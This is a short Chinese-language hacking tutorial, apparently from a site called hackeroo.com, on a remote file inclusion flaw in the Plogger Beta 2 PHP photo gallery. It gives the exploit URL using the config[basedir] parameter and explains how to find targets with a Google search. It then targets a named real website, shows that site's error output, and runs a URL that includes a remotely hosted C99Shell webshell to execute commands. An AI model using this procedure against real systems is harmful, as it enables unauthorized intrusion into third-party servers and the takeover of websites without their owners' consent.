http://www.hackeroo.com/Plogger是一款基于PHP的网络日记程序。 Plogger未过滤用户提交的URI数据,可以利用漏洞以WEB权限执行任意命令。漏洞在'plog-admin-functions.php'脚本对用户提交的'config[basedir]'参数没有过滤,指定远程服务器上的任意PHP文件作为包含对象,可以以WEB权限执行任意PHP代码 EXP:
http://www.hackeroo.com/PATH/admin/plog-admin-functions.php?config[basedir]=http://www.hackeroo.com/[code] 恩,高手看到这就跑去拿WEBSHELL了,感觉是不是很像PollVote投票系统那个漏洞原来我也是按照PollVote那个漏洞的思路去测试,但是并没有测试成功,我们现在就要到国外的一款PHP木马了,C99Shell v. 1.0 利用过程非常简单首先还是先进入http://www.google.com,搜索Powered by Plogger! 如果是Plogger Beta 2就可以利用了,把C99Shell v. 1.0 传到自己的空间里保存形式为php.txt 搜索到一个http://buckheadbuilders.com/gallery/ 就他了下面的是他默认后台,有漏洞的就是这“plog-admin-functions.php”文件 http://buckheadbuilders.com/gallery/admin/plog-admin-functions.php 恩,出错了
Warning: main(/plog-functions.php): failed to open stream: No such file or directory in /hsphere/local/home/buckhead/buckheadbuilders.com/gallery/admin/plog-admin-functions.php on line 2 Fatal error: main(): Failed opening required '/plog-functions.php' (include_path='.:/usr/local/lib/php') in /hsphere/local/home/buckhead/buckheadbuilders.com/gallery/admin/plog-admin-functions.php on line 2 这样我把可以100%的拿到WEBSHELL了!执行 http://buckheadbuilders.com/gallery/admin/plog-admin-functions.php?config[basedir]=http://www.hackeroo.com/php.txt?&cmd=id php.txt里就是C99Shell v. 1.0 这款PHP木马了,幸运的人``现在应该看到WEBSHELL了!!!